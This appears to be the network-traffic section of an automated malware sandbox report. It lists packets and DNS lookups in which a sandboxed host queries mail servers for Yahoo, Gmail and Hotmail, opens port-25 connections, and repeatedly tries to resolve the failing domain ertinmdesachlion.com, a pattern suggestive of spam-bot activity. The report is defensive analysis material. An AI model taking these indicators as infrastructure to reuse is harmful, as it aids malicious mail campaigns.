                                                                  May 29, 2023 12:09:07.688798904 CEST2549699104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:09:07.688863039 CEST4969925192.168.2.4104.47.18.161
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 29, 2023 12:08:56.446839094 CEST5968353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.469856024 CEST53596838.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.488616943 CEST6416753192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.517162085 CEST53641678.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.530642986 CEST5856553192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.545115948 CEST53585658.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.558708906 CEST5223953192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.565623999 CEST5680753192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.573407888 CEST53522398.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.595958948 CEST53568078.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.704440117 CEST6100753192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.719270945 CEST53610078.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.770046949 CEST6068653192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.772181988 CEST6112453192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.813844919 CEST53611248.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.818828106 CEST53606868.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.819009066 CEST5944453192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.851736069 CEST53594448.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.858681917 CEST5557053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.891666889 CEST53555708.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.895817995 CEST6490653192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.936825991 CEST53649068.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:56.991333008 CEST5944653192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:56.991942883 CEST5086153192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.024194002 CEST53508618.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.027148008 CEST53594468.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.058486938 CEST6108853192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.072884083 CEST53610888.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.099978924 CEST5872953192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.131136894 CEST53587298.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.207417011 CEST6470053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.209470987 CEST5602253192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.216517925 CEST6082253192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.234597921 CEST53647008.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.236496925 CEST53560228.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.266289949 CEST53608228.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.545277119 CEST4975053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.567842007 CEST53497508.8.8.8192.168.2.4
                                                                  May 29, 2023 12:08:57.737387896 CEST6055053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:08:57.764712095 CEST53605508.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:06.883358955 CEST5485153192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:06.906258106 CEST53548518.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:06.936913013 CEST5730053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:06.951689959 CEST53573008.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:06.994626999 CEST5452153192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.014516115 CEST53545218.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.025388956 CEST5891453192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.048424006 CEST53589148.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.115349054 CEST5141953192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.146219969 CEST53514198.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.238343954 CEST5105453192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.261553049 CEST53510548.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.287853956 CEST5567353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.294683933 CEST4973553192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.317189932 CEST53556738.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.325964928 CEST53497358.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.326173067 CEST5243753192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.354629040 CEST53524378.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.383367062 CEST5282553192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.416253090 CEST53528258.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.445856094 CEST5853053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.474673033 CEST6495953192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.487732887 CEST53585308.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.495090008 CEST6309353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.509610891 CEST53649598.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.528597116 CEST53630938.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.583739996 CEST5043353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.606775045 CEST53504338.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.610234976 CEST5349853192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.630606890 CEST53534988.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.678050995 CEST6146053192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.683275938 CEST6300153192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.696145058 CEST6513353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.708158016 CEST53614608.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.723443985 CEST53651338.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.725240946 CEST53630018.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:07.914297104 CEST6099853192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:07.944766998 CEST53609988.8.8.8192.168.2.4
                                                                  May 29, 2023 12:09:08.182660103 CEST6173353192.168.2.48.8.8.8
                                                                  May 29, 2023 12:09:08.217622995 CEST53617338.8.8.8192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  May 29, 2023 12:08:56.446839094 CEST192.168.2.48.8.8.80x8dbStandard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.488616943 CEST192.168.2.48.8.8.80x80d4Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.530642986 CEST192.168.2.48.8.8.80x5569Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.558708906 CEST192.168.2.48.8.8.80x5e33Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.565623999 CEST192.168.2.48.8.8.80x8b5Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.704440117 CEST192.168.2.48.8.8.80x7087Standard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.770046949 CEST192.168.2.48.8.8.80xc867Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.772181988 CEST192.168.2.48.8.8.80xede6Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.819009066 CEST192.168.2.48.8.8.80x2573Standard query (0)alt1.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.858681917 CEST192.168.2.48.8.8.80x65adStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.895817995 CEST192.168.2.48.8.8.80xc828Standard query (0)alt3.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.991333008 CEST192.168.2.48.8.8.80x538aStandard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.991942883 CEST192.168.2.48.8.8.80xc5c7Standard query (0)alt2.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.058486938 CEST192.168.2.48.8.8.80x7849Standard query (0)hotmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.099978924 CEST192.168.2.48.8.8.80x61Standard query (0)hotmail-com.olc.protection.outlook.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.207417011 CEST192.168.2.48.8.8.80x1bcdStandard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.209470987 CEST192.168.2.48.8.8.80x1206Standard query (0)www3.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.216517925 CEST192.168.2.48.8.8.80x65b3Standard query (0)www6.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.545277119 CEST192.168.2.48.8.8.80x2846Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.737387896 CEST192.168.2.48.8.8.80x95bfStandard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.883358955 CEST192.168.2.48.8.8.80x8b19Standard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.936913013 CEST192.168.2.48.8.8.80x864aStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.994626999 CEST192.168.2.48.8.8.80x24abStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.025388956 CEST192.168.2.48.8.8.80x1f7fStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.115349054 CEST192.168.2.48.8.8.80x1cd2Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.238343954 CEST192.168.2.48.8.8.80x4113Standard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.287853956 CEST192.168.2.48.8.8.80xa6a1Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.294683933 CEST192.168.2.48.8.8.80x26e6Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.326173067 CEST192.168.2.48.8.8.80x5db0Standard query (0)alt1.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.383367062 CEST192.168.2.48.8.8.80xe333Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.445856094 CEST192.168.2.48.8.8.80x81f2Standard query (0)alt3.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.474673033 CEST192.168.2.48.8.8.80x1872Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.495090008 CEST192.168.2.48.8.8.80x2b70Standard query (0)alt2.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.583739996 CEST192.168.2.48.8.8.80xef9fStandard query (0)hotmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.610234976 CEST192.168.2.48.8.8.80xf139Standard query (0)hotmail-com.olc.protection.outlook.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.678050995 CEST192.168.2.48.8.8.80xb3eStandard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.683275938 CEST192.168.2.48.8.8.80x9015Standard query (0)www3.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.696145058 CEST192.168.2.48.8.8.80x196eStandard query (0)www6.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.914297104 CEST192.168.2.48.8.8.80x2e11Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:08.182660103 CEST192.168.2.48.8.8.80x89b2Standard query (0)www4.ertinmdesachlion.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  May 29, 2023 12:08:56.469856024 CEST8.8.8.8192.168.2.40x8dbNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.469856024 CEST8.8.8.8192.168.2.40x8dbNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.469856024 CEST8.8.8.8192.168.2.40x8dbNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.517162085 CEST8.8.8.8192.168.2.40x80d4No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.545115948 CEST8.8.8.8192.168.2.40x5569No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.573407888 CEST8.8.8.8192.168.2.40x5e33No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.595958948 CEST8.8.8.8192.168.2.40x8b5Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.719270945 CEST8.8.8.8192.168.2.40x7087No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.719270945 CEST8.8.8.8192.168.2.40x7087No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.719270945 CEST8.8.8.8192.168.2.40x7087No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.719270945 CEST8.8.8.8192.168.2.40x7087No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.719270945 CEST8.8.8.8192.168.2.40x7087No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.813844919 CEST8.8.8.8192.168.2.40xede6No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.818828106 CEST8.8.8.8192.168.2.40xc867Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.851736069 CEST8.8.8.8192.168.2.40x2573No error (0)alt1.gmail-smtp-in.l.google.com142.251.9.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.891666889 CEST8.8.8.8192.168.2.40x65adNo error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:56.936825991 CEST8.8.8.8192.168.2.40xc828No error (0)alt3.gmail-smtp-in.l.google.com74.125.200.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.024194002 CEST8.8.8.8192.168.2.40xc5c7No error (0)alt2.gmail-smtp-in.l.google.com142.250.150.26A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.027148008 CEST8.8.8.8192.168.2.40x538aName error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.072884083 CEST8.8.8.8192.168.2.40x7849No error (0)hotmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.131136894 CEST8.8.8.8192.168.2.40x61No error (0)hotmail-com.olc.protection.outlook.com104.47.18.161A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.131136894 CEST8.8.8.8192.168.2.40x61No error (0)hotmail-com.olc.protection.outlook.com104.47.18.225A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.234597921 CEST8.8.8.8192.168.2.40x1bcdName error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.236496925 CEST8.8.8.8192.168.2.40x1206Name error (3)www3.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.266289949 CEST8.8.8.8192.168.2.40x65b3Name error (3)www6.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.567842007 CEST8.8.8.8192.168.2.40x2846Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:08:57.764712095 CEST8.8.8.8192.168.2.40x95bfName error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.906258106 CEST8.8.8.8192.168.2.40x8b19No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.906258106 CEST8.8.8.8192.168.2.40x8b19No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.906258106 CEST8.8.8.8192.168.2.40x8b19No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:06.951689959 CEST8.8.8.8192.168.2.40x864aNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.014516115 CEST8.8.8.8192.168.2.40x24abNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.048424006 CEST8.8.8.8192.168.2.40x1f7fNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.146219969 CEST8.8.8.8192.168.2.40x1cd2Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.261553049 CEST8.8.8.8192.168.2.40x4113No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.261553049 CEST8.8.8.8192.168.2.40x4113No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.261553049 CEST8.8.8.8192.168.2.40x4113No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.261553049 CEST8.8.8.8192.168.2.40x4113No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.261553049 CEST8.8.8.8192.168.2.40x4113No error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.317189932 CEST8.8.8.8192.168.2.40xa6a1No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.325964928 CEST8.8.8.8192.168.2.40x26e6Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.354629040 CEST8.8.8.8192.168.2.40x5db0No error (0)alt1.gmail-smtp-in.l.google.com142.251.9.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.416253090 CEST8.8.8.8192.168.2.40xe333No error (0)gmail-smtp-in.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.487732887 CEST8.8.8.8192.168.2.40x81f2No error (0)alt3.gmail-smtp-in.l.google.com74.125.200.26A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.509610891 CEST8.8.8.8192.168.2.40x1872Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.528597116 CEST8.8.8.8192.168.2.40x2b70No error (0)alt2.gmail-smtp-in.l.google.com142.250.150.26A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.606775045 CEST8.8.8.8192.168.2.40xef9fNo error (0)hotmail.comMX (Mail exchange)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.630606890 CEST8.8.8.8192.168.2.40xf139No error (0)hotmail-com.olc.protection.outlook.com104.47.18.161A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.630606890 CEST8.8.8.8192.168.2.40xf139No error (0)hotmail-com.olc.protection.outlook.com104.47.18.225A (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.708158016 CEST8.8.8.8192.168.2.40xb3eName error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.723443985 CEST8.8.8.8192.168.2.40x196eName error (3)www6.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.725240946 CEST8.8.8.8192.168.2.40x9015Name error (3)www3.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:07.944766998 CEST8.8.8.8192.168.2.40x2e11Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  May 29, 2023 12:09:08.217622995 CEST8.8.8.8192.168.2.40x89b2Name error (3)www4.ertinmdesachlion.comnonenoneA (IP address)IN (0x0001)false
                                                                  TimestampSource PortDest PortSource IPDest IPCommands
